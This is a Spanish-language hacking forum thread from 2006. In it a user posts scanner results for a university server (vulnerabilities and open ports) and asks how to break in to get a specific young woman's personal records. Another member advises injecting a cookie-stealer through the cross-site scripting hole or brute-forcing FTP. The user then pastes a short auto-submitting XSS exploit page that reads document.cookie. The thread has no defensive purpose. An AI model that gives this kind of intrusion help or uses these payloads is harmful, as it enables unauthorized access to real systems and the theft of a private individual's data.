Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Noviembre 18, 2008, 01:46:12
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL (Moderadores: |Shadow|, ManCuerTex (ViPeR))  |  Tema: Como introducirme 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Como introducirme  (Leído 341 veces)
:. Soldier .:
Game Over
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1052


I'm Jarvis


Ver Perfil WWW Email
« en: Octubre 20, 2006, 09:06:56 »
En línea

Visita mi Blog: ↓

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
ManCuerTex
Visitante
« Respuesta #1 en: Octubre 20, 2006, 10:42:12 »
En línea
:. Soldier .:
Game Over
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1052


I'm Jarvis


Ver Perfil WWW Email
« Respuesta #2 en: Octubre 20, 2006, 06:23:28 »
El lugar es una Universidad, hize un scan de la pagina web,y vi que tenia el ftp y demas cosas vulnerables o abiertos, y por logica es k es de un servidor, el log, pues necesito toda la informacion de una chava como su expediente, y aki estan las vulnerabiliades escaneadas. Las vulnerabilidades de color rojo y azul son asi como me aparecieron en un cuadrito al hacer scan con el SSS. Y pues por logica se ve que es OS Linux

Vulnerabiliades

CGI Scripts          Cross-Site Scripting Vulnerability
RPC Services         Multiple Linux Vendor rpc.statd Remote Format String Vulnerability
RPC Services         Multiple Vendor rpc.statd Arbitrary File Creation Deletion Vulnerability
RPC Services         Multiple Vendor Statd Buffer Overflow Vulnerability
Web Servers          Apache Mod_SSL Apache-SSL Buffer Overflow Vulnerability
Web Servers          OpenSSL ASN.1 Large Recursion Remote Denial Of Service Vulnerability
Web Servers          OpenSSL ASN.1 Parsing Vulnerabilities
Web Servers          OpenSSL Bad Version Oracle Side Channel Attack Vulnerability
Web Servers          OpenSSL Denial of Service Vulnerabilities
Web Servers          OpenSSL Insecure Protocol Negotiation Weakness
Web Servers          OpenSSL Timing Attack RSA Private Key Information Disclosure Vulnerability
Web Servers          PHP cURL Encoded NULL Character Safe_Mode Restriction Bypass Vulnerability
Web Servers          PHP Error_Log Safe_Mode Restriction-Bypass Vulnerability
FTP Servers          Anonymous FTP
FTP Servers          FTP Bruteforce
RPC Services         Solaris rpc.statd rpc Call Relaying Vulnerability


Puertos TCP abiertos                               
21
80
111   SUNRPC - SUN Remote Procedure Call
845
845   RPC Unix
1521  Oracle
2100
3306  MYSQL
8080  Generic-Shared service port
12711
32770
32775

Puertos UDP
845   RPC Unix
« Última modificación: Octubre 20, 2006, 06:27:23 por z04d » En línea

Visita mi Blog: ↓

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
arquimedes
Visitante
« Respuesta #3 en: Octubre 21, 2006, 06:55:50 »
CGI Scripts          Cross-Site Scripting Vulnerability->mira esta vulnerabilidad es,creo yo la mas util para obterner l pass del admin, solo busca el script y inyectale un cookie-stealer.
Otra manera de acerlo es x ftp-bruteforce xq de la manera q tu t metes es x via anonimo y no vas a tener acceso a muxos sitios del server
En línea
:. Soldier .:
Game Over
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1052


I'm Jarvis


Ver Perfil WWW Email
« Respuesta #4 en: Noviembre 03, 2006, 10:17:13 »
Miren he encontrado esta este script de la vulnerabilidad   cross site scripting, pero no se como introducirla o como usarla para hackear el sitio que deseo?

 -------------exploit.htm--------------

  <form name='f' action="
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion" method="post">

  <input name="avatarselect" value='" >&lt;script&gt;alert(document.cookie)&lt;/script&gt;'>

  <input type="submit" name="submitavatar" value="Select avatar">

  </form>

  &lt;script&gt;

  window.onload=function()

   {

    document.all.submitavatar.click();

   }

  &lt;/script&gt;

  ---------------end-------------------

espero me ayuden
salu2
En línea

Visita mi Blog: ↓

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
:. Soldier .:
Game Over
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 1052


I'm Jarvis


Ver Perfil WWW Email
« Respuesta #5 en: Noviembre 08, 2006, 10:50:53 »
Oigan amigos no van a ayudarme es k necesito su ayuda, porfavor diganme como puedo introducir este script para tener acceso al servidor deseado

gracias
En línea

Visita mi Blog: ↓

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL (Moderadores: |Shadow|, ManCuerTex (ViPeR))  |  Tema: Como introducirme « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC